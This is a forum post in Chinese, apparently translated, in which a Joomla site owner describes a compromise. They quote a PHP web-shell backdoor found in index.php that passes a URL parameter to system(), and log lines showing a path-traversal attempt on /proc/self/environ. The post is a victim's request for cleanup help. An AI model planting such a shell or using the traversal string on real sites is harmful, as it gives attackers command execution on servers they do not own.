我正在运行的一个 Joomla 网站前几天被黑了。黑客将一些文件放入 tmp 目录,并以某种方式在那里运行 HTTP 守护程序(至少我的主机是这么告诉我的)。无论如何,我一直在努力清理他们留下的文件并尽可能保护我的安全,但在检查我的日志时,我注意到www.domain.com/?cmd=ls. 这对我来说似乎很奇怪,所以我尝试了它...... 瞧,它列出了我网站根目录中的所有文件。有人可以向我解释为什么会发生这种情况以及我如何阻止它吗?这似乎是一个巨大的漏洞,我想立即消除它。
更新:在挖掘过程中,我注意到在 Joomla index.php 中添加了一些额外的行:
if ($_GET['cmd']!=null) {
system($_GET['cmd']);
}
我已经删除了这些,但很想知道攻击者是如何设法编辑这些的。不太确定在哪里查看以确保我关闭了任何后门。
更多更新:首先让我说是的,我意识到这里正确的行动方案是炸毁网站并从备份中恢复。但是我更愿意把它作为最后的手段,因为 (a) 它是一个依赖社区贡献的网站,而且我的备份不是最近的(我的错,我知道)和 (b) 我正在开发一个新的应该很快准备好的版本。但是因为我似乎在这里得到了一些帮助,所以我将添加一些我发现/做的其他事情,以试图解决这种情况。
在我的 /tmp 文件夹中找到了一些 .kin(或类似的东西 - 没有记下它并立即将其删除)目录,这显然是运行这个 http 守护程序的地方。我假设 gunzip(如下所述)是如何放置在这里的。
在我的 error_log 文件中,我发现了以下可疑条目(“...”是我试图从这篇文章中删除路径/文件名):
[04-Jul-2010 09:45:58] PHP Fatal error: Class 'CkformsController../../../../../../../../../../../../../../../proc/self/environ' not found in ... on line 24
[05-Jul-2010 12:31:30] PHP Notice: Undefined index: HTTP_USER_AGENT in ... on line 92
[04-Jul-2010 06:41:52] PHP Warning: rmdir(...) [<a href='function.rmdir'>function.rmdir</a>]: Directory not empty in ... on line …